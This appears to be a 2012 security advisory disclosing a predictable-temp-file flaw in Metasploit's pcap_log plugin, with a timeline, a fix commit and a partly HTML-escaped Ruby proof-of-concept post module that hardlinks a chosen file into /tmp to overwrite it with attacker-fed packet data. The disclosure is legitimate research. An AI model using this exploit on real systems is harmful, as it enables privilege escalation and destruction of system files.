0A29-12-2 :Metasploit 'pcap_log' plugin privilege escalation vulnerability

2012-07-2300:00:00

vulners.com

JSON

================
0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:

Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug
which can further be leveraged to insert user-controlled data resulting in
potential escalation of privileges

================
Timeline:

16 July 2012 - Reported
16 July 2012 - Acknowledged & fixed by HD Moore
https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740
16 July 2012 - Public disclosure
http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html

Details:

By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap to a file like
'/tmp/msf3-session_2012-07-16_15-15-35.pcap'. This is of course is
predictable so a simple 'ln' in advance to a privileged file will
result in arbitrary file overwrite. The module has to run as root.

Here's the fun part - by sending packets we can then insert our own
content into any file (surrounded by pcap headers and all
the other packets)

======
Sample PoC (needs work)

modules/post/linux/exploit/metasploit_pcaplog.rb

$Id$

## This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

web site for more information on licensing and terms of use.

http://metasploit.com/

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Linux::System

def initialize&#40;info={}&#41;
    super&#40; update_info&#40; info,
            &#39;Name&#39;          =&gt; &#39;Metasploit plugin &quot;pcap_log&quot;

arbirary file overwrite / privilege escalation',
'Description' => %q{ Post exploitation module to
exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin.
Depending on the file you choose to
overwrite, you will need to netcat/telnet etc. the data
that you wish to appear in the file.},

            &#39;License&#39;       =&gt; MSF_LICENSE,
            &#39;Author&#39;        =&gt; [ &#39;0a29406d9794e4f9b30b3c5d6702c708&#39;],
            &#39;Version&#39;       =&gt; &#39;$Revision$&#39;,
            &#39;Platform&#39;      =&gt; [ &#39;linux&#39; ],
            &#39;SessionTypes&#39;  =&gt; [ &#39;shell&#39;, &#39;meterpreter&#39; ],
            &#39;References&#39; =&gt;
                            [
                                    [ &#39;URL&#39;,

'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'
],
[ 'URL',
'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740'
]
],
'DisclosureDate'=> "July 16 2012"

        &#41;&#41;
            register_options&#40;[
        OptInt.new&#40;&#39;NUMBER&#39;, [true, &#39;Number of seconds to prime

/tmp/ with', nil]),
OptString.new('FILE', [true, 'File to
overwrite with PCAP data', nil]),
], self.class)

end

def link&#40;t&#41;
    file_part = &quot;&#37;s_&#37;04d-&#37;02d-&#37;02d_&#37;02d-&#37;02d-&#37;02d.pcap&quot; &#37; [
                &quot;msf3-session&quot;, t.year, t.month, t.mday, t.hour,

t.min, t.sec
]
fname = ::File.join("/tmp", file_part)
retval = session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")
end

# Run Method for when run command is issued
def run
    for i in 0..&#40;datastore[&#39;NUMBER&#39;]&#41;
        link&#40;Time.now+1&#41;
    end
    print_status&#40;&quot;Set #{datastore[&#39;NUMBER&#39;]} links.&quot;&#41;
end

def cleanup
    print_status&#40;&quot;Manual cleanup required: rm -f /tmp/msf3-session*&quot;&#41;
end

end